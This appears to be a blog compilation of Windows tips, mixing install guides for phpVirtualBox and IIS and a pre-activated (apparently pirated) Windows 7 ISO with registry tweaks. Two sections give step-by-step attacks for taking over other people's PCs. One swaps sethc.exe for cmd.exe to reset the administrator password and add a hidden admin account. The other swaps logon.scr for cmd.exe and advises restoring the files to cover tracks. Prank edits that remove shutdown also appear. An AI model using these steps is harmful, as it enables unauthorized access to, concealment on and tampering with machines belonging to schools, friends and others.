Service Pack 1
Microsoft released the first official service pack for Windows 7 on February 22, 2011. This is an important update that includes previously released security, performance, and stability updates for Windows 7. SP1 also includes new improvements to features and services in Windows 7, such as improved reliability when connecting to HDMI audio devices, printing using the XPS Viewer, and restoring previous folders in Windows Explorer after restarting.
Windows 7 Service Pack 1 is an update that does the following :

- Helps keep PCs supported.
- Provides ongoing improvement to the operating system, by including previous updates delivered over Windows Update as well as continuing incremental updates to the Windows 7 platform based on customer and partner feedback.
- Makes it easy for organizations to deploy a single set of updates.

How to install :
**************

Extract using WinRAR.
- Use ImgBurn** to burn the extracted ISO file called "faXcooL.Windows.7.SP1.ENG.x86-x64.ACTiVATED"
* You can use any other software for this operation (Nero, Alcohol, CloneCD...)
* Burning speed should not be faster than 4x.
- Restart your computer*.
* You can install it from existing OS, but I'll recommend the clean installation.
- Make sure you've seleceted your DVD-ROM/RW drive as a first boot device (BIOS setup)*
* If you don't know how to do that, check this link http://www.hiren.info/pages/bios-boot-cdrom
- The text message will appear "Press any key to boot from CD or DVD...."
* By pressing the key you're entering the setup.
- Select your language, time and currency and keyboard input (optionaly)
- Click "Install now".
- Choose your edition* (x86 is 32-bit, x64 is 64-bit) depending of CPU type you have.
* Note that if you have less than 4GB of RAM, x64 will be useless.
- Click "I accept".
- Click "Custom (advanced).
- Choose your partition/hdd drive where Win7 should be installed and click format.
* Setup will continue automaticly and it will finish after 15-30 min.
- Next step will be username (Image 17).
- Type your password (if you want).
- Choose the third option for next step.
- Select your time zone.
- Select your current location.
- And the last step will be silent auto-activation*
* Your PC will restart for the last time.

And that would be all about installation. You're in Win.

Install phpVirtualBox on Windows & Linux

What is phpVirtualBox: How to Install phpVirtualBox on Windows & Linux

This article introduces phpVirtualBox, an open source, AJAX and PHP-based implementation of the Oracle VirtualBox interface.

oracle VirtualBox is a great enterprise ready virtualisation software. However, what it lacks is a powerful Web-based management interface. Usually, people prefer VMWare over VirtualBox, as it has good Web-based remote management interface.

phpVirtualBox provides an interface that"s a VirtualBox-look-alike for people who are not command-line savvy. Through phpVirtualBox, you can control a headless VirtualBox VM from a Web browser, including operations such as start/stop VMs, take snapshots, configure VMs, import/export VMs, and much more.

The requirements are:
  • Any Web server with PHP 5.2.0 or later; xampp will be good.
  • A working installation of Oracle VirtualBox 3.2.2 or later.
  • Any Web browser--- Firefox, Opera, Chrome or IE---will do the job.
Installation on Windows

Installation is very simple. Here , I"m using Windows XP SP3.

Install Oracle VirtualBox OSE 3.2.10, and then install xampplite-win32-1.7.3. Download phpVirtualBox 0.5 from here and extract the files/folder into htdocs directory. phpVirtualBox requires that vboxwebsrv.exe
must be running on the Oracle VirtualBox host machine. This file is located at C:\Program Files\Oracle\VirtualBox\.
Now, edit the config.php file and change it to the following settings:
Now navigate to the resulting folder in your Web browser. ( see the figure below)

Installation on Linux

The installation on Linux is also very simple. I am using Ubuntu 9.10 for this work, and installed xampp-linux-1.7.3. It comes with the latest PHP version. To install Oracle VirtualBox 3.2 on Ubuntu, first you have to add the repos for VirtualBox in your /etc/apt/sources.list:
After that, update your repository cache with the following command :
To install Oracle VirtualBox, run the code given below:
phpVirtualBox requires you to start the vboxwebsrv program, located under /usr/bin:
Here are the parameters :
  • -b : run the program in the background
  • -logfile : log file location for vboxwebserv
Now download phpVirtualBox 0.5:

Unpack it to /var/www or /usr/local/apache2/htdocs. In config.php, edit the following parameters:

Now navigate to the resulting folder in your Web browser.

NOTE: for the sake of tutorial, i have used a single physical machine for Oracle VirtualBox and phpVirtualBox. If you don,t want burden at your Oracle VirtualBox installation with a Web server, then you can host phpVirtualBox on another machine. In that case, you have to make some simple modifications.
Till then enjoy the post and keep visiting !!!

Enable Telnet in windows 7

It’s very rare that I use Telnet these days, so it took a long time for me to notice that by default it was not packaged with Windows 7. I did some research and found out that this was also true for Windows Vista. More than likely this was an attempt to make Windows more secure by default, as Telnet is very insecure and whenever you have the choice you should always use SSH. However, with that being said, you can quickly re-enable Telnet by following these steps:

  1. Start
  2. Control Panel
  3. Programs And Features
  4. Turn Windows features on or off
  5. Check Telnet Client
  6. Hit OK
After that you can start Telnet via Command Prompt. Credits FettesPS

Hack administrator from Guest account.

Ever wanted to hack your college pc with guest account/student account so that you can download with full speed there ? or just wanted to hack your friend’s pc to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the  administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on…
Concept
Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.
Prerequisites
Guest account with write access to system 32.
Here is how to do that -
  • Go to C:/windows/system32
  • Copy cmd.exe and paste it on desktop
  • rename cmd.exe to sethc.exe
  • Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

  • Now Log out from your guest account and at the user select window,press shift key 5 times.
  • Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

  • Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
  • You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.
  • Congrats You have hacked admin from guest account.
Further..
Also, you can further create a new user at the command prompt by typing “NET USER XERO /ADD” where “XERO” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -
Go to registry editor and navigate to this key
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Here create a new DWORD value, write its name as the “user name” that u created for your admin account and live with your admin account forever :)
I hope that was informative..

Install IIS Server for ASP asp.net Script in Windows XP

Install IIS Server for ASP asp.net Script in Windows XP
If you are running Windows XP Professional on your computer you can install Microsoft’s web server, Internet Information Server 5.1 (IIS) for free from the Windows XP Pro installation CD and configure it to run on your system by following the instructions below: -

iis asp asp.net srver
1. Place the Windows XP Professional CD-Rom into your CD-Rom Drive.
2. Open ‘Add/Remove Windows Components’ found in ‘Add/Remove Programs’ in the ‘Control Panel’.
3. Place a tick in the check box for ‘Internet Information Services (IIS)’ leaving all the default installation settings intact.
4. Once IIS is installed on your machine you can view your home page in a web browser by typing ‘http://localhost’ (you can substitute ‘localhost’ for the name of your computer) into the address bar of your web browser. If you have not placed your web site into the default directory you should now be looking at the IIS documentation.
5. If you are not sure of the name of your computer right-click on the ‘My Computer’ icon on your desktop, select ‘Properties’ from the shortcut menu, and click on the ‘Computer Name’ tab.
6. Your default web directory to place your web site in is ‘C:Inetpubwwwroot’, but if you don’t want to over write the IIS documentation found in this directory you can set up your own virtual directory through the ‘Internet Information Services’ console.
7. The ‘Internet Information Services’ console can be found in the ‘Administration Tools’ in the ‘Control Panel’ under ‘Performance and Maintenance’, if you do not have the control panel in Classic View.
8. Double-click on the ‘Internet Information Services’ icon.
Once the ‘Internet Information Services’ console is open you will see any IIS web services you have running on your machine including the SMTP server and FTP server, if you chose to install them with IIS.
9. To add a new virtual directory right click on ‘Default Web Site’ and select ‘New’, followed by ‘Virtual Directory’, from the drop down list.
10 Next you will see the ‘Virtual Directory Creation Wizard’ from the first screen click the ‘next’ button.
11. You will then be asked to type in an ‘Alias’ by which you will access the virtual directory from your web browser (this is the name you will type into your web browser after ‘localhost’ to view any web pages you place in the directory).
12. Next you will see a ‘Browse…’ button, click on this to select the directory your web site pages are in on your computer, after which click on the ‘next’ button to continue.
13. On the final part of the wizard you will see a series of boxes, if you are not worried about security then select them all, if you are and want to run ASP scripts then check the first two, followed by the ‘next’ button.
14. Once the virtual directory is created you can view the web pages in the folder by typing ‘http://localhost/aliasName’ (where ‘aliasName’ is, place the alias you called the virtual directory) into the address bar of your web browser (you can substitute ‘localhost’ for the name of your computer if you wish).
done.

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.

Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Registry Hacking

Display legal notice on startup:
Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.
REGEDIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\policies\system]"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your legal notice text"

Automatic Administrator Login:
Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
REGEDIT 4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"

No Shutdown:
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer
"NoClose"="DWORD:1"

Menu Delays:

Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.

GPEDIT.MSC And Autoplay

A great tweaking file that comes with XP is gpedit.msc. Go to Start -> Run... and then type in 'gpedit.msc' and press enter. This is effectively the Policies Editor, and it comes in handy often. For example, if you hate CD autoplay like I do and want to permanently disable it, you can use this tool to do so. Just run gpedit.msc, then go to Computer Configuration -> Administrative Templates -> System. In here you can see the value 'Turn Off Autoplay'. Right-click on it and then click 'Properties'.

Increasing options in add/remove programs:

Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp4 0ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

To this:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".

Automatically Kill Programs At Shutdown:

don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1.

Speeding Up Share Viewing:

This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement!

Create a Shortcut to Lock Your Computer

Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

Speed up Internet Explorer 6 Favorites
For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works.

Aspi

WinXP does not come with an Aspi layer. So far almost 90% of the problems with WinXP and CD burning software are Aspi layer problems. After installing WinXP, before installing any CD burning software do a few things first: 1. Open up "My computer" and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called "Recording". On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer. 2. Next install the standard Aspi layer for NT. Reboot when asked. That's is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they are currently incompatible but Roxio has promised a fix as soon as XP is released.

Windows PHP Socket Hijack Tool + Video

Due to a problem in the way Apache binds itself to port 80 on Windows machines allows the PHP environment running under Apache to gain access to the information being sent to port 80, which in turn can be leveraged to preform man-in-the-middle attacks.

This problem is exploited by the PHP tool linked below.
